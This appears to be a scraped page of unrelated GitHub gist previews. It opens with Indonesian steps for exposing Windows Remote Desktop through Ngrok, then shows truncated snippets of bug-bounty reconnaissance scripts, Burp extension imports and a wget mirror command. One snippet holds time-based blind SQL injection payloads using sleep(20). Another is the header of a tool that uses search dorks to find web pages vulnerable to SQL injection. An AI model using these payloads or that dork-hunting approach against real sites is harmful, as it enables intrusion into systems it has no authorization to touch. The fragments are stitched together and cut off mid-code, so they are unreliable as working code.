Berikut adalah langkah-langkah untuk mengaktifkan Remote Desktop Protocol (RDP) di Windows 10 dan mengaksesnya melalui Ngrok:
-
Buka Settings dengan menekan tombol
Windows + I
. -
Pilih System > Remote Desktop.
-
Aktifkan Enable Remote Desktop.
import requests | |
# Step 1: Get the initial buildId from the first request | |
response1 = requests.get('https://immunefi.com/bug-bounty/') | |
response1.raise_for_status() # Ensure we got a successful response | |
# Find the buildId in the response body | |
start_index = response1.text.find('"buildId":"') + len('"buildId":"') | |
end_index = response1.text.find('"', start_index) | |
build_id = response1.text[start_index:end_index] |
#!/usr/bin/python | |
import io | |
import tldextract | |
def extract(infile): | |
with io.open(infile, encoding='utf-8') as f: | |
for line in f: | |
domain = line.strip('\n') | |
extracted = tldextract.extract(domain) |
uro -i waymore.txt -o uro | |
sleep 1 | |
/root/urldedupe/urldedupe -u uro -s -qs | tee dup | |
sleep 1 | |
httpx -l dup -nc -sc -ct -o duph | |
sleep 5 |
from burp import IBurpExtender | |
from burp import IHttpListener | |
from burp import IProxyListener | |
from burp import IExtensionHelpers | |
from burp import IScannerListener | |
from burp import IExtensionStateListener | |
from burp import IParameter | |
from java.io import PrintWriter | |
from java.net import URLEncoder | |
from burp import ITab |
wget --mirror --convert-links --adjust-extension --page-requisites --no-parent |
https://www.editpad.org/tool/extract-text-from-image |
#!/usr/bin/env python3 | |
import json | |
from urllib.parse import quote, quote_plus | |
import sys | |
import os | |
import argparse | |
parser = argparse.ArgumentParser( |
AND sleep(20)# | |
'%2b(select*from(select(sleep(20)))a)%2b' | |
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z |
""" | |
***** Auto-finder by dorks tool with Google API & Bing API ***** | |
@author: z0rtecx | |
@release date: dec-2014 | |
@version: 1.0.12122014 | |
@poc: good dork for find web pages whit SQLi vulnerability in ID parameter, e.g. "inurl:details.php?id=" | |
@description: This tool is for save time for you. It is gathering dorks of a txt file, and search potential web pages with SQLi vulnerability. ONLY FOR MySQL errors. | |
@features: |